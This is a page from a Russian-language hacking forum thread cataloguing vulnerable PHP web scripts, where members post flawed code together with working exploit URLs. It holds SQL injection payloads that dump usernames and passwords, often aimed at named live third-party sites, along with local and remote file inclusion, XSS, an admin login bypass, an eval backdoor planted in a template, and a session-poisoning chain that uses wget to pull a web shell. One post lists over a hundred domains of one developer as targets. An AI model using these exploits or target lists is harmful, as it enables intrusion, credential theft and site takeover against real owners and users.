Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    ClipShare вроде 4.0

    Пассивная XSS :(

     
    1 person likes this.
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    iGamingCMS1.5
    SQL
    Файл reviews.php
    PHP:
    $review $db->Execute("         SELECT *         FROM `sp_reviews`         WHERE             sp_reviews.id = '{$_REQUEST['id']}';");    
    __http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13+--+

    _http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,concat_ws(0x3a,PSEUDO,pass),3,4,5,6,7,8,9,10,11,12,13+from+sp_members+--+

    ЗЫ префикс у них sp_


    Blind-sql
    Файл gamedetails.php
    PHP:
    $result $db->Execute("SELECT * FROM `sp_games` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
    __http://www.patches-scrolls.info/gamedetails.php?id=1+and+substring(version(),1,1)=5


    PS там еще есть фалики с типа таким же запросом


    RFI/shell

    в админке Файл loadplugin.php
    PHP:
    require_once("$_REQUEST[load]");  
    необходимо
    allow_url_include = on
    MQ= off

    http://127.0.0.1/iGamingCMS1.5/admin/loadplugin.php?load=http://shell.txt?
    2) способ залития шелла

    Файл template_editor.php

    PHP:
    if ($myfilehandle=@fopen('../templates/' $_REQUEST['filename'],'w'))      {          if (get_magic_quotes_gpc())          {              $editbuffer stripslashes($editbuffer);          }          fputs($myfilehandle,$editbuffer);          fclose($myfilehandle);          echo "Saved OK";  
    по сути
    http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php

    там дается на выбор файлы из папки templates, но помоему нам ни чего не мешает выйти)из нее

    http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php?filename=../index.php

    (ну или в один из инклудившихся файлов писать код)
    и в дальнейшем пишем пыщ пыщ код))) или тупо код шелла :D
     
    _________________________
    #162 HAXTA4OK, 28 Oct 2009
    Last edited: 29 Oct 2009
    6 people like this.
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    PHMe
    LFI

    файл www.php

    PHP:
    $currentFile 'www.php';  require_once('con-fig/site_info.php');  require_once('con-fig/theme_info.php');  require_once("themes/{$Tdir}/top.php");  require_once('resources/function_list.php');  require_once("themes/{$Tdir}/bottom.php");    
    Файл resources/function_list.php

    PHP:
    require('resources/mod/'.$_GET['action'].'.php');  
    http://localhost/phme/www.php?action=../../admin~/untitled
     
    _________________________
    4 people like this.
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    iXon CMS
    SQL

    Уже по ходу любимый файл Rss.php

    PHP:
    ...
    $id $_GET['id'];  
    $post_data get_all_post_data($id);
    ..    
    $result mysql_query("SELECT * FROM comments WHERE post_id = $id ORDER BY comment_date ASC");                    while ($comments mysql_fetch_array($result))
    ...
    ?>  
    http://localhost/iXon_CMS%200.30%20Beta/rss.php?id=1+union+select+1,2,3,4,5,6,7,unhex(hex(version())),9,10--

    ну и вроде в инете видел что было выложено LFI

    банальное раскрытие путей как с htmlspecialchars

    PHP:
    $redirect 'login-control.php?redirect_to='.urlencode($_GET['redirect_to']);  
    http://localhost/iXon_CMS%200.30%20Beta/ixon-admin/login.php?redirect_to[]=

     
    _________________________
    #164 HAXTA4OK, 30 Oct 2009
    Last edited: 30 Oct 2009
    4 people like this.
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    The Hablator chat

    Раскрытие путей
    В Cookies
     
    1 person likes this.
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Set-CMS

    Оффициальная страничка

    Активная XSS
    Модуль гостевая книга
    PHP:
    if ($mc == "ok")
    {
     
    $title "Сохранение сообщения";
     if (isset(
    $_COOKIE['flood_feedback'])) {$er[] = "Флуд-защита.Подождите некоторое время...";}
     if (isset(
    $_POST['user_name'])){setcookie("user_name"$_POST['user_name'], time()+333333333);}
     if (isset(
    $_POST['user_email'])){setcookie("user_email"$_POST['user_email'], time()+333333333);}
     if (isset(
    $_POST['user_icq'])){setcookie("user_icq"$_POST['user_icq'], time()+333333333);}
     if (isset(
    $_SESSION[$uniqueid.'name_admin'])){$_POST['user_name'] = $_SESSION[$uniqueid.'name_admin'];}
     if (isset(
    $_SESSION[$uniqueid.'email_admin'])){$_POST['user_email'] = $_SESSION[$uniqueid.'email_admin'];}
     if (isset(
    $_SESSION[$uniqueid.'icq_admin'])){$_POST['user_icq'] = $_SESSION[$uniqueid.'icq_admin'];}
     
    $text_gb saveuser($_POST['user_text']);
     
    $name saveuser($_POST['user_name']);
     
    $email saveuser($_POST['user_email']);
     
    $icq saveuser($_POST['user_icq']);
     
    $code $_POST['code'];
     if (
    $code == "") { $er[] = "Нет кода!";  }
     
    $ffile file("files/feedback.set");
     for(
    $a=0;$a<count($ffile);$a++) {
       
    $ee explode("<>"$ffile[$a]);
       if (
    $ee[5] == $code)
       { 
    $er[] = "Флудишь,мля!Отправлено только одно сообщение"; }
     }
    В поле "Ваше имя" вставляем
    Эта же бага встречается в комментариях к новостям.
    Тоже поле имя.

    Раскрытие путей :D

    Раскрытие путей с помощью PHPSESSID
    Думаю обьяснения не нужны.

    Пассивная XSS

     
    #166 Ctacok, 31 Oct 2009
    Last edited: 31 Oct 2009
    5 people like this.
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    iManga_v0.3
    SQL

    Файл showcomments.php

    PHP:
    $postid $_GET['postid'];        
    $post mysql_query("SELECT * FROM `" $global['prefix'] . "news` WHERE id=" $postid);      
    $post mysql_fetch_array($post);  
    http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,version(),3,4,5--

    http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,concat_Ws(0x3a,username,password),3,4,5+from+users--

    ЗАливка шелла

    в админке http://localhost/iManga_v0.3/upload/admin/postcomic.php

    PHP:
    $target_path "../comics/" basename($_FILES['file']['name']);   
    if (
    move_uploaded_file($_FILES['file']['tmp_name'], $target_path))      
    {echo 
    "<strong>The comic was successfully uploaded.</strong>\n<br /><br />";  
    http://localhost/iManga_v0.3/upload/comics/shell.php
     
    _________________________
    3 people like this.
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Clicknet_CMS_v2.1
    Чтение файлов

    MQ=off
    register_globals= on

    Файл menu.php

    PHP:
    <?php    
    $menufil 
    $_SERVER["DOCUMENT_ROOT"] . $lokal "menus/$indhold[2].php"
     
    $menuitems file($menufil);

    http://localhost/Clicknet_CMS_v2.1/plugins/menu.php?lokal=/путь/до/файла/admin/htpasswd

    LFI

    Файл index.php
    MQ=off
    register_globals= on
    PHP:
    ...
    $lokal $content;
    } else {
    $lokal "/";
    }
    ...
    include(
    $_SERVER["DOCUMENT_ROOT"] . $lokal "count.php");

    http://localhost/Clicknet_CMS_v2.1/index.php?content=/путь/до/файла%00

    Файл head.php

    PHP:
    if ($indhold[2]) 
    {  echo 
    "<td width=\"150\" valign=\"top\">\n";      include($_SERVER["DOCUMENT_ROOT"] . $lokal "plugins/menu.php");      
    echo 
    "</td>\n";  
    http://localhost/Clicknet_CMS_v2.1/head.php?indhold[2]=1&lokal=/путь/до/файла%00

    Файл foot.php

    PHP:
    include($_SERVER["DOCUMENT_ROOT"] . $lokal "sys/fodnote.php");  
    http://localhost/Clicknet_CMS_v2.1/foot.php?lokal=/путь/до/файла%00
     
    _________________________
    #168 HAXTA4OK, 3 Nov 2009
    Last edited: 3 Nov 2009
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ZAKRZAK
    LFI

    Файл index.php

    PHP:
    include('include/init.php');
    Файл init.php

    PHP:
    if ($_SESSION['lang'])      
    $lang=$_SESSION['lang'];  
    if (
    $_GET['lang'])      $lang=$_GET['lang'];  
    if (!
    $lang
    {      
    $lang=$usr_prefs['lang'];  }  
    $_SESSION['lang']=$lang;  include('langs/'.$lang.'.php');  
    http://localhost/zakrzak-0.01/index.php?lang=../../test
     
    _________________________
    2 people like this.
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    В теме есть часть информации по нижеследующему, но не так подробно:

    Sad Raven Guest Book <=v1.3

    Она же sr guest.

    Вход в админ панель:

    Code:
    <?php
    if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin]))
    ?>
    
    1. Админка находится по адресу: http://site.com/guest/admin.php
    2. Зайти можно с таким запросом (условие - register globals=on):

    Code:
    http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282
    3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105)

    но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим:

    1. После перехода по ссылке выше у нас появятся две куки:

    Code:
    Имя:
    alogin
    Содержимое:
    3105
    Узел:
    site.com
    Путь:
    /guest/
    
    Имя:
    pass
    Содержимое:
    3105
    Узел:
    site.com
    Путь:
    /guest/
    
    к которым надо будет добавить третью (через тот же плагин для FF cookie editor):

    Code:
    Имя:
    Password[3105]
    Содержимое:
    37e7897f62e8d91b1ce60515829ca282
    Узел:
    site.com
    Путь:
    /guest/
    
    и вот тогда мы уже полноценные админы

    2. Заливка шелла:

    - Идем в http://site.com/guest/admin.php?design
    - Правим footer.inc.php - вставляем
    Code:
    <?php eval(stripslashes($_GET[e]));?>
    
    для 100% уверенности, обходим magic_quotes=ON

    3. проверяем:

    http://site.com/guest/index.php?e=phpinfo();

    4. Льем шелл.
    ====================================

    fckeditor <=2.2

    возможны версии чуть выше:

    dork: inurl:dialog/fck_about.html

    Раскрытие пути заливки файла:

    1. Идем по адресу - editor/filemanager/browser/default/connectors/test.html
    может отличаться, всегда поймете что искать идя от корня (если доступен просмотр папок с веба)

    2. Выставляем Connector: - PHP

    3. Жмем "Get Folders and Files" - появляется примерно такое среди всего прочего:

    что есть абсолютный путь куда будут заливаться файлы относительно корня сайта, она же папка, доступная на запись.


    Залитие шелла:

    1. Connector: - PHP
    2. Переименовываем шелл (например wso2.php) в wso2.php.xss - т.е. на конце задаем несуществующее расширение файла.
    3. Заливаем
    4. Переходим по ссылке (исходя из примера выше):

    http://site.com/config/_uploads/File/wso2.php.xss

    и всё, у вас полноценный шелл

    бонус:

    в очень многих даже пропатченных и современных версиях fceditor все равно есть уязвимости, например раскрытие асболютного пути сервера, если заливать корректный тип файла, но в поле "Current Folder" подставить что-то вроде:

    ini.php%00

    часто вываливается ошибка записи из tmp-директории с полным путем к управляющему скрипту

    PS: fceditor используется в большинстве CMS - редактирование новости, загрузка картинок, редактирование страниц - всё он практически, полный путь к fceditor можно узнать попытавшись вставить картинку в тело новости и нажать на то, что сверху в этом окошке, типо title - открывается веб-путь к fceditor.

    Проверить версию (пример) -

    Code:
    http://topkredite.ch/_admin/_system/htmleditor/editor/dialog/fck_about.html
     
    7 people like this.
  11. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    seo тулза TextMaker от SibirDesign 2008

    SibirDesign AllRightReserved 2008

    наверное, пользы от этого сообщения будет мало, но все равно выложу))
    ===================
    LFI

    magic_quotes = off

    PHP:
    /index.php
    ...
    include(
    "login.php");
    ...
    switch (
    $_GET['cmd']) {
      case 
    "config":
    ...
      case 
    "block":
    $sym=array("q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m");
    $sym2=array("Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
    $_GET['type']=str_replace($sym2,$sym,$_GET['type']);
    $_GET['use']=str_replace($sym2,$sym,$_GET['use']);
    include(
    "block/".$_GET['type']."/".$_GET['use'].".php");
        break;
    ...
    PHP:
    /login.php
    ...
    if((
    $_GET['cmd']!="block")and($_GET['type']!='export')and($_GET['use']!='rss')){
    if(isset(
    $_POST['login']) and isset($_POST['password'])){
    $_SESSION['login']=$_POST['login'];
    $_SESSION['password']=$_POST['password'];
    }
    if((
    $_SESSION['login']!=$_auto['login'])or($_SESSION['password']!=$_auto['password'])){
        include(
    "form/login.htm");
        exit();
    }
    }
    ...
    exploit:
    http://textmaker/?cmd=block&use=rss&type=../sql.txt%00​

    ====================
    SQL-injection

    magic_quotes = off

    PHP:
    /index.php
    ...
    как и при LFIНо не меняя параметров $_GET['type'и $_GET['use'инклудится файл block\export\rss.php
    ...
    PHP:
    /block/export/rss.php
    ...
    if(@
    $_GET['done']!='yes'){
    ...
    }else{
    header("Content-Type: text/xml; charset=utf-8");
    $sql3="SELECT * FROM `project` WHERE `id` LIKE '".@$_GET['viewid']."'";
    $result1 $db->sql_query($sql3);
    $project=$db->sql_fetchrow($result1);
    $sql3="SELECT * FROM `text` WHERE `idproject` LIKE '".@$_GET['viewid']."'";
    $result1 $db->sql_query($sql3);
    $num=$db->sql_numrows($result1);
    ...
    exploit:
    http://textmaker/index.php?cmd=block&type=export&use=rss&done=yes&viewid=1%27+union+select+1,2,concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),4,5,6,7,8,9,10,11+--%20-​

    в исходнике
    <link>root@localhost textmaker 5.0.45-community-nt \usr\local\mysql5\ \usr\local\mysql5\data\ /tmp Win32</link>​
     
    3 people like this.
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Название: Mi-Dia Blog
    Автор: Christopher Shaw
    Адресс оффициальной странички: http://www.mi-dia.co.uk/

    Активная XSS.
    В комментариях к записям блога.
     
  13. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Doop CMS 1.3.7 LFI

    Оффсайт: http://doop.infoauxis.com/
    Для загразки почему то доступна только эта версия, предыдущих я не нашел.

    Сама CMS достаточно проста, имеет всего навсего один скрипт.

    Уязвимый код:

    Code:
    if (!isset($_REQUEST['page'])){
    	$_REQUEST['page']=$homepage; 
    	$cpage=$_REQUEST['page'];
    } else { $cpage=$_REQUEST['page']; }
    ...
    if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
    	if (file_exists("pages/".$cpage.".htm")){
    		include("pages/".$cpage.".htm");
    	}
    	else include("pages/".$cpage.".html");
    }
    
    Разработчики хоть и попытались "защититься" с помощю file_exists() и указанием папки, но совершенно забыли о фильтрации передаваемых значений.

    Эксплатация:
    Code:
    http://localhost/cmss/index.php?page=../../../../file%00
     
    3 people like this.
  14. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Пермь - разработчик datakit
    сайт разработчика -http://datakit.ru/
    уязвимость - sql injection
    table - sys_users (user_login,user_password)
    admin panel - http://localhost/admin/logon/index.html
    Примеры -
    Code:
    http://www.peugeot-perm.ru/main/index.html?id=192&nid=148/**/and/**/1=2/**/union/**/all/**/select/**/1,concat(user_login,0x3a,user_password),3,4,5,6,7/**/from/**/sys_users
    Code:
    http://www.spass.perm.ru/main/index.html?id=6&nid=88/**/and/**/1=2/**/union/**/all/**/select/**/1,2,concat(user_login,0x3a,user_password),3,4,5,6/**/from/**/sys_users
    сайты принадлежащие датакит
    Code:
    12v.perm.ru 
    303030.ru 
    59.gibdd.ru 
    abperm.ru 
    abs59.ru 
    arsenal-perm.ru 
    auto.perm.tv 
    avocado-perevod.ru 
    beltprom.ru 
    bestcreditcard.ru 
    bestcreditcards.ru 
    bigbr.ru 
    black-bar.ru 
    chusovoy.ru 
    clubxl.ru
    comcars.ru 
    comedy.perm.ru 
    crystalltech.ru 
    datakit.ru 
    dav-auto.ru 
    echo.perm.ru
    ecotr.ru
    edwardsgym.ru
    eksformat.ru
    empireguru.ru
    eng.trophy59.perm.ru
    ermak.ru
    flashdj.ru
    forstroy.ru
    gagner.perm.ru
    gibdd.perm.ru
    globasclub.ru
    globassclub.ru
    goodwillperm.ru
    if-detstvo1.ru
    if-zaschita.ru
    kgbpro.ru
    kislorodclub.ru
    komcars.ru
    kuzov59.ru
    lemax.tv
    malmass.ru
    mashtab-stroy.ru
    mebelpolonii.ru
    medpipe.ru
    megastarperm.ru
    migom.perm.ru
    new-ground.ru
    nravitso.ru
    on-line.perm.ru
    online59.ru
    pecpl.ru
    pnevmatic.ru
    portacafe.ru
    positiveline.ru
    printhall.ru
    ptsm.perm.ru
    royalfm.ru
    shoutaim.ru
    skclassic.ru
    spk-nhs.ru
    staratovich.ru
    stfc.ru
    stolica-perm.ru
    swedengroup.ru
    syava.net
    taan.ru
    timontii.ru
    timontii.shoutaim.ru
    toyota-verratmn.ru
    toyota59.ru
    uitc.ru
    vektor.perm.ru
    verra-tyumen.ru
    vs01.datakit.ru
    www.abs59.ru
    www.alexiy.ru
    www.armsbp.ru
    www.audit-kontrakt.ru
    www.bionica-club.ru
    www.bionicaclub.com
    www.clubxl.ru
    www.crazylove.perm.ru
    www.dav-auto.ru
    www.dveregrad.ru
    www.edwardsgym.ru
    www.ekskargo.ru
    www.en.skclassic.ru
    www.ermak.ru
    www.gsi-pngs.ru
    www.honda59.ru
    www.new-ground.ru
    www.nissan-tmn.ru
    www.on-line.perm.ru
    www.permdomo.ru
    www.peugeot-perm.ru
    www.plazaolympia.ru
    www.portacafe.ru
    www.shoutaim.ru
    www.spass.perm.ru
    www.tk.perm.ru
    www.toyota59.ru
    www.trophy59.perm.ru
    www.ural-venture.ru
    www.vektor.perm.ru
    zurs.ru
    (c) x60unu
     
    5 people like this.
  15. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Программа: Quon Database Management
    Описание: недостаточная фильтрация входяших данных, sql injection & xss
    Уязвимый код:
    moviepage.php
    Code:
    $query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
    $result = @mysql_query($query);
    
    exploit: www.example.com/moviepage.php?id=1+union+select+1,2,3,4,5,concat_ws(0x3a,email,password,admin),7,8+from+users
    barcode.php
    Code:
    $query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
    $result = @mysql_query($query);
    $row = @mysql_fetch_array($result);
    
    exploit: www.example.com/barcode.php?id=-1+union+select+email,2,password,4,5,6,7,8+from+users
    checkin.php
    Code:
    <INPUT TYPE="text" name="check" id="check" value="<?php echo $getid;?>">
    
    exploit:www.example.com/checkout.php?id=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
    exploit:www.example.com/checkin.php?id=xss%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
    ©trumpcode.org
     
    #175 warlok, 8 Nov 2009
    Last edited: 8 Nov 2009
    3 people like this.
  16. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Ananta_Gazelle 1.0

    Раскрытие путей

    Code:
    http://localhost/anata/search.php?lookup[]=ololo
    Pasive XSS

    Уязвимый код:

    Code:
    $pagetitle = "Search";
    $lookup = "";
    if (isset($_GET) && isset($_GET["lookup"]) && $_GET["lookup"]) {
    	$pagetitle .= " for ".$_GET["lookup"];
    	$lookup = $_GET["lookup"];
    } else {
    	$lookup = "";
    }
    
    Как видно, передаваемый GET'ом парамерт lookup не
    фифильтруется.

    Эксплатация:

    Code:
    http://localhost/anata/search.php?lookup="><script>alert()</script>
    Вторая пасивная XSS в скрипте user.php

    Уязвимый код:

    Code:
    if (isset($_GET) && isset($_GET["user"]) && $_GET["user"]) {
    	$pagetitle .= " for ".$_GET["user"];
    }
    
    Та же картина.

    Эксплатация:

    Code:
    http://localhost/anata/user.php?user="><script>alert()</script>
    Но от XSS'ок толку нету, так как движок не работает с куками :D

    Так что это с чисто познавательной целью.

    P.S: там еще есть что то пожожее на инъекцию в insert запросе, но сейчас времени мало. Если выжму с не что то - выложу ;)
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    AdaptBB
    Версия: Последняя.

    Активная XSS

    /profile/
    Avatar меняем на javascript:alert()
     
    5 people like this.
  18. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    CMS Faethon v 2.0.4 SQL injection && Active XSS
    Вreetz: Red_red1 && ElteRUS
    Скрипт autor.php

    Уязвимый код:

    PHP:
    ...
    elseif(isset(
    $_GET['name']))
    {
        
    $result=sql_query("SELECT id, name FROM ".$SQL_PREFIX."_authors WHERE item = '" $_GET['name'] . "';");
    }
    ...
    Передаваемый GET'ом параметр name не фильтруеться.

    Эксплатация:

    Code:
    http://localhost/bug/author.php?name=vasua'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1
    скритп info.php

    PHP:
    $result=sql_query("SELECT title, text FROM ".$SQL_PREFIX."_html_sections WHERE address = '" $_GET['item'] . "';");
    Эксплатация:

    Code:
    http://localhost/bug/info.php?item=-1'[COLOR=Yellow][SQL][/COLOR]
    XSS:

    Уязвимый код:

    PHP:
    ...
    $author $_POST['author'];
    $email $_POST['email'];
    $web $_POST['web'];
    $subject $_POST['subject'];
    ...
    Эксплатация:
    В комментах:
    Code:
    "><script>alert()</script>
     
    #178 Ins3t, 9 Nov 2009
    Last edited: 9 Nov 2009
    3 people like this.
  19. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    SkaDate social networking software

    Code:
    http://com.skadate.com
    dork: "SkaDate social networking software" filetype:php 
    
    Уязвим параметр language_id=[LFI], запоминается в куках.

    /inc/class.language.php
    PHP:
    function Language()
        {
            if( 
    $_GET['language_id'] )
            {
                
    $this->curr_lang_id $_GET['language_id'];
                
    setcookie'language_id'$_COOKIE['language_id'], time()-1PATH_HOME );
                
    setcookie'language_id'$_GET['language_id'], time()+2592000PATH_HOME );
            }
            elseif( 
    $_COOKIE['language_id'] )
            {
                
    $this->curr_lang_id $_COOKIE['language_id'];
            }
            else
            {
                
    $this->curr_lang_id getConfig'def_lang_id' );
            }
    Находим инклуд
    http://www.exoticity.net/privacy.php?language_id=../../../../../../etc/passwd%00

    Смотрим куки, интересует параметр skadate_sessid, видим md5, к примеру 08fc79f504eb70c4c6b769e62831f494.

    Ищем сессию в /tmp/.
    http://www.exoticity.net/privacy.php?language_id=../../../../../../tmp/sess_08fc79f504eb70c4c6b769e62831f494%00
    Если не угадали, находим php.ini и смотрим, куда сохраняется сессия, аналогично инклудим ее.

    Теперь сессия запомнилась в куках и инклудится на экран.

    Льем минишелл в сессию
    http://www.exoticity.net/member/online_list.php?pg=<?if($_GET[pass])system($_GET[pass]);?>

    Выполняем команду и льем минишелл для следующей команды
    http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&pass=ls .. -lia;id

    Открываем исходный код странички (форматирование не нарушено), видим наши права в системе, доступные на запись каталоги.
    Абсолютный путь тоже виден, льем шелл.

    http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&&pass=wget http://site/shell.txt -O /home/exoticit/public_html/images/shell.php

    =======
    Примеры: http://forum.antichat.ru/showpost.php?p=1595768&postcount=990
     
    4 people like this.
  20. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    PHP-Fusion
    Bug:SQL inkection

    Exploit:
    http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--


    Code:
    http://recipe.jones-net.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
    выводит в Comments
     
    3 people like this.